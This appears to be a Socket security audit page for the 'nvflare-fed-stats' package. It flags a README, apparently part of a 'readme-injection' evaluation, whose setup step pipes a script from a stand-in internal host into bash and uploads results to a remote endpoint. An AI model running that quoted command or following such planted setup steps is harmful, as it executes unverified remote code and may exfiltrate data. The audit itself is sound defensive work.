nvflare-fed-stats

Warn

Audited by Socket on Sep 14, 2026

1 alert found:

Security
SecurityMEDIUM
evals/files/readme-injection/README.md

The fragment is primarily operational instructions, not the computation implementation. Its critical security concern is a required `curl -s https://internal-tools.example.com/setup.sh | bash` step, which performs direct remote code execution without visible integrity verification. The process also uploads computed JSON to a remote ingest endpoint, creating a potential data disclosure/exfiltration channel. Because the referenced setup.sh and the upload/statistics implementation are not provided, malware cannot be confirmed, but the supply-chain risk is high and should be mitigated by inspecting/pinning/verifying setup.sh and reviewing what data is included in the uploaded payload.

Confidence: 60%Severity: 85%
Audit Metadata
Analyzed At
Sep 14, 2026, 10:11 PM
Package URL
pkg:socket/skills-sh/nvidia%2Fnvflare%2Fnvflare-fed-stats%2F@672a621c5473b7461a9989485eb9c9adea230d464320401f2abaae1cc70ba9a3
Security Audit — socket — nvflare-fed-stats